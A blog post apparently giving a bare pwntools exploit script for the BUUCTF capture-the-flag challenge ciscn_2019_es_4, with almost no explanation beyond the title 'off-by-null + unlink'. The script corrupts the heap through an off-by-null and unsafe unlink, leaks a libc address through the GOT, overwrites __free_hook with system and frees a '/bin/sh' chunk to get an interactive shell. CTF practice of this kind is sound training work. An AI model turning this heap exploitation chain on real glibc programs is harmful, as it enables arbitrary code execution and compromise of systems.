BUUCTF ciscn_2019_es_4

off-by-null + unlink

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'

s = process('./ciscn_2019_es_4')
#s = remote('node4.buuoj.cn',25370)
libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
elf = ELF('./ciscn_2019_es_4')

def add(index,size,content):
    s.sendlineafter(b'4.show\n' , b'1')
    s.sendlineafter(b'index:\n' , str(index))
    s.sendlineafter(b'size:\n' , str(size))
    s.sendafter(b'content:\n' , content)

def delete(index):
    s.sendlineafter(b'4.show\n' , b'2')
    s.sendlineafter(b'index:\n' , str(index))

def edit(index,content):
    s.sendlineafter(b'4.show\n' , b'3')
    s.sendlineafter(b'index:\n' , str(index))
    s.sendafter(b'content:\n' , content)

def show(index):
    s.sendlineafter(b'4.show\n' , b'4')
    s.sendlineafter(b'index:\n' , str(index))

target = 0x6020E0 + 8 * 7
fd = target - 0x18
bk = target - 0x10

key2_addr = 0x6022B8

for i in range(7):
    add(i , 0xf0 , b'a') # 0-6

s.sendlineafter(b'4.show\n' , b'1')
s.sendlineafter(b'index:\n' , str(7))
s.sendlineafter(b'size:\n' , str(0x88))
s.recvuntil(b'gift: ')
heap_addr = int(s.recv(7),16)
success('heap_addr=>' + hex(heap_addr))
s.sendafter(b'content:\n' , b'a') # 7

add(8 , 0xf0 , b'a') # 8
add(9 , 0x80 , b'a') # 9
add(10 , 0x80 , b'a') # 10
add(11 , 0x80 , b'/bin/sh\x00') # 11

for i in range(7):
    delete(i)


payload = p64(0) + p64(0x81)
payload+= p64(fd) + p64(bk)
payload+= b'\x00'*0x60
payload+= p64(0x80)

edit(7 , payload)
delete(8)

payload = p64(heap_addr + 0x190) + p64(heap_addr + 0x190)
payload+= p64(elf.got['free']) + p64(0x602100)

edit(7 , payload)

delete(4)
delete(5)

add(4 , 0x80 , p64(key2_addr)) # 4
add(5 , 0x80 , p64(key2_addr)) # 5
add(8 , 0x80 , p64(0xfffffff)) # 8

show(6)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['free']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
__free_hook = libc_base + libc.sym['__free_hook']


edit(7 , p64(__free_hook))
edit(4 , p64(system_addr))
delete(11)

#gdb.attach(s)
s.interactive()

 

posted @ 2022-01-29 17:03  狒猩橙  阅读(104)  评论(1编辑  收藏  举报